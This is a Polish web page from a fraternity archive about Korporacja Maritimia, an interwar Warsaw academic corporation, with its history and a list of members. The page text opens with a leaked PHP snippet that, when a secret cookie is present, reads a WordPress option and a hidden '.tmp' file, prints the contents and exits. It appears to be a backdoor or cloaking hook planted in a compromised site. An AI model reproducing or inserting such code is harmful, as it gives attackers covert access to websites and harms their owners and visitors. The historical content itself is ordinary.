if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Maritimia

Dekiel Maritimii - vide Poszukiwania. Nazwa:
Korporacja Maritimia
Siedziba:
Warszawa
Data powstania:
1922/23 r. (10 II 1923 r. ?)
Barwy:
jasnolazurowa – złota – zielona
Dewiza:
„Ad mare” („Dążmy ku morzu”)

Rys historyczny

Prezydium Maritimii, Warszawa ok. 1931 r.

Maritimia powstała w roku akademickim 1922/23 w Gdańsku jako Związek Akademiki “Ad mare”. W roku akademickim 1924 siedziba organizacji została przeniesiona do Warszawy. Wkrótce potem stowarzyszenie zostało przekształcone w korporację akademicką.

Maritimia należała do tzw. korporacji morskich. Celem związku była praca na rzecz ugruntowania przywiązania do polskiego morza. Dla realizacji tego celu Maritimia współpracowała z Ligą Morską i Rzeczną. Wraz z działającymi w Warszawie innymi korporacjami morskimi - Concordia Varsoviensis i Baltitia była współzałożycielką Centralnego Koła Młodzieży przy warszawskim oddziale Ligi Morskiej i Rzecznej.

Od 1926 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 29 III 1926 r.). Kandydowała pod opieką K! Jagiellonia. Prawa członka rzeczywistego uzyskała w 1927 r. W konsekwencji “reform” jędrzejewiczowskich w 1935 (36?) r. doszło do samorozwiązania korporacji. Później istniało jedynie Koło Filistrów.

Siedziby Maritimii mieściły się: w latach 1927-29 przy ul. Złotej 23 (lokal Ligi Morskiej i Rzecznej), w latach 1929-31 przy ul. Grójeckiej 30/22, a w latach 1931-33 (36?) przy ul. Wilczej 47/49 m. 44.

Całkowita ustalona, niekompletna imienna lista członków korporacji obejmuje 63 nazwiska, w tym sześciu członków honorowych.

Brak wiadomości o powojennej działalności Maritimii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Maritimii obejmuje 63 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Ejsmont, kpt., działacz Ligi Morskiej i Kolonialnej, Filister honorowy Maritimii
 2. Głowacki, prawd. ojciec Zdzisława, Filister honorowy Maritimii
 3. Meissner, prof., kurator i Filister honorowy Maritimii [prawd. Alfred Meissner (4 października 1883 w Wielkim Sławsku k. Kruszwicy - 13 kwietnia 1952 w Warszawie ) absolwent Gimnazjum Marii Magdaleny w Poznaniu 1905, student stomatologii w Greiswaldzie i Wrocławiu, lek. dentysta 1908, student med. w Lipsku i Monachium, lek. med. 1913, dr med. Instytutu Dentystycznego UWr. 1914, habilitacja 1927, od 1928 prof. nadzw. PID, prorektor 1935-39 i rektor 1939 Akademii Stomatologicznej (wcześniej PID), organizator i dziekan 1946-48 Wydziału Stomatologii UŁ, organizator i kierownik Katedry Chirurgii Stomatologicznej 1945-52, prof. zw. 1946, pochowany na warszawskich Powązkach]
 4. Sujkowski, Filister honorowy Maritimii
 5. Edward Warchałowski, (4 października 1885 w pow. stopnickim - 6 marca 1953) student i absolwent Instytutu Geodezyjnego w Moskwie i Wydziału Matematycznego Uniwersytetu w Moskwie, geodeta, prof. Wydziału Geodezji PW, dziekan Wydziałów Inżynierii Wodnej i Miernictwa 1924-53, rektor PW 1933-36 oraz 1945-52, dr honoris causa AG, Filister honorowy Maritimii
 6. Wiktor Zieliński, Filister honorowy Maritimii

Członkowie rzeczywiści

 1. Mieczysław Grzegorz Bekker, (1905 w Strzyżewie - 1989 w Santa Barbara) student PW, c. 1927/28, akt. 1927/28, inż., konstruktor
 2. Anatol Beynar-Beynarowicz, student UW, akt. 1926-30, I wiceprezes 1926 oraz sem. let. 1927/28
 3. Mieczysław Biłowiecki, ( - 1944 w Warszawie) prawnik, adwokat, zginął w Powstaniu Warszawskim
 4. Mirosław Borkowski, student PW, c. 1932, akt. 1932/33
 5. Władysław Borowski, student PW, od 1929 PL, akt. 1927-33
 6. Witold Butwiłłowicz (Butwiłowicz), student UW, c. 1931/32, akt. 1931/32-33, skreślony
 7. Kazimierz Dominik, (1907-1996) student PID, ac. 1931/32, akt. 1931/32-33
 8. Władysław Drozdowski, (1916-2002) student WSH, akt. 1927-31
 9. Henryk Dryll, student UW, akt. 1927-33
 10. Józef Dybowski, student PW, c. 1927/28, akt. 1927/28-33
 11. Zdzisław Głowacki, student PW, akt. 1927-33

  Henryk Golanowski, ok. 1931 r.

 12. Henryk Rudolf Golanowski, (3 stycznia 1909 w Warszawie - 18 grudnia 1979 w Warszawie) student i absolwent med. 1933 UW, c. 1929/30, akt. 1929/30-33, wiceprezes zewn. sem. zim. 1931/32, prezes sem. zim. 1932/33, dr med., chirurg i ginekolog, w wojnie obronnej 1939 zastępca Naczelnego Lekarza Obrony Miasta, po wojnie organizator, dyrektor i ordynator oddziału chirurgii szpitala w Malborku 1945-48, następnie przez wiele lat zastępca ordynatora oddziału chirurgicznego szpitala na Solcu w Warszawie oraz kierownik placówek lecznictwa otwartego, odznaczony londyńskimi Krzyżem Armii Krajowej oraz Krzyżem Walecznych

 13. Mieczysław Grzeszkiewicz, student UW, c. 1927/28, akt. 1927/28-33
 14. Marian Jakimiński, student WSH, c. 1929/30, akt. 1929/30-33, wiceprezes wewn. sem. zim. 1931/32
 15. Wojciech Karwowski, (1906 - 10 października 1972 w Warszawie) student UW, akt. 1926-31, sekretarz 1926, prezes sem. let. 1929/30 i sem. zim. 1930/31
 16. Mieczysław Marian Koszla, ( - 27 listopada 1908 w Tarczynie w woj. warszawskim, prawd. brat Zygmunta (Maritimia), student i absolwent 1934 med. UW, c. 1930/31, akt. 1930/31-33, chirurg i ortopeda dziecięcy, dr med.
 17. Zygmunt Koszla, ( - 1942 w Radomiu) prawd. brat Mariana (Maritimia), student UW, c. 1930/31, akt. 1930/31-33, sekretarz sem. zim. 1932/33, zamordowany przez Niemców
 18. Zdzisław Królewski, student SGGW, od 1931 UW, c. 1930/31, akt. 1930/31-33, sekretarz sem. zim. 1931/32, I wiceprezes sem. zim. 1932/33
 19. Józef Kwiecień, student WSH, c. 1929/30, akt. 1929/30-31, sekretarz sem. zim. 1930/31
 20. Józef Lefort, student WSH, akt. 1927-30
 21. Karol Łotocki, student PID, c. 1931/32, akt. 1931/32-33
 22. Zdzisław Majewski, student WSH, c. 1929/30, akt. 1929/30-33, I wiceprezes sem. zim. 1930/31, olderman sem. zim. 1931/32
 23. Witold Malczewski, student WSH, od 1930 UP, c. 1929/30, akt. 1929/30-32
 24. Stanisław Marciniak, student WSH, od 1932 KUL, c. 1930/31, akt. 1930/31-33
 25. Tadeusz Michalski, student UW, c. 1931/32, akt. 1931/32
 26. Eugeniusz Müller, student WSH, c. 1929/30, akt. 1929/30-33, skarbnik sem. zim. 1931/32
 27. Juljusz Nehrebecki, student UW, c. 1932, akt. 1932/33
 28. Józef Nowakowski, student WSH, akt. 1927-31
 29. Władysław Nowakowski, student SGGW, akt. 1927-32
 30. Ludomir Nowierski, student UW, c. 1927/28, akt. 1927/28-30
 31. Kazimierz Olechowski, inż.
 32. Tadeusz Olechowski, student WSH, akt. 1926-33, II wiceprezes 1926 oraz sem. let. 1927/28
 33. Mieczysław Pęski, student WSH, c. 1929/30, akt. 1929/30
 34. Stanisław Poboży, student WSH, c. 1930/31, akt. 1930/31-33
 35. Paweł Preiss, student UW, c. 1932, akt. 1932/33
 36. Zbigniew Radecki, student WSH, od 1932 UW, c. 1931/32, akt. 1931/32-33
 37. Jerzy Radzio,
 38. Zbigniew Radziszewski, student WSH, c. 1931/32, akt. 1931/32
 39. Wacław Rozbicki,
 40. Stanisław Rutkowski,
 41. Arkadjusz Rząca, student WSH, akt. 1927-31, wiceprezes zewn. sem. let. 1928/29
 42. Stanisław Sakowski, student WSH, akt. 1927-31, wiceprezes wewn. sem. let. 1928/29
 43. Tadeusz Sikorski, student PID, c. 1932, akt. 1932/33
 44. Wiktor Skrzyński, student UW, c. 1929/30, akt. 1929/30
 45. Stefan Słoński, student UW, c. 1931/32, akt. 1931/32-33
 46. Zygmunt Starowicz, student PW, akt. 1927-30, prezes sem. let. 1928/29, olderman sem. let. 1929/30
 47. Tadeusz Szafnicki, student UW, od 1929 UP, akt. 1927-30
 48. Kurt Thomalla, student WSH, c. 1930/31, akt. 1930/31-33
 49. Jan Wasilewski, (1908-1981) student i absolwent PID, akt. 1931-33
 50. Stefan Wojak, student WSH, akt. 1927-31, prezes 1926 oraz sem. let. 1927/28
 51. Tadeusz Jerzy Wysocki, student WSH, c. 1929/30, akt. 1929/30-32, II wiceprezes 1932/33
 52. Kazimierz Zagrzejewski, student PW, akt. 1927-33, olderman sem. let. 1928/29, I wiceprezes sem. let. 1929/30, olderman sem. zim. 1930/31, prezes sem. sem. zim. 1931/32
 53. Mieczysław Zajdel, student PW, c. 1930/31, akt. 1930/31
 54. Zygmunt (Jan Zygmunt) Zieliński, student PW, akt. 1926-33, olderman 1926 oraz sem. let. 1927/28, II wiceprezes sem. zim. 1930/31
 55. Zenon Ziółkowski, student UW oraz UP 1931/32, c. 1927/28, akt. 1927/28-33, sekretarz sem. let. 1928/29, II wiceprezes sem. let. 1929/30, olderman sem. let. 1932/33
 56. Bolesław Znamierowski, student PW, c. 1927/28, akt. 1927/28-33
 57. Edward Żerdzicki, student WSH, c. 1929/30, akt. 1929/30-33

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1927-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Maritimia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 9 IX 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Maritimia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 9 IX 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }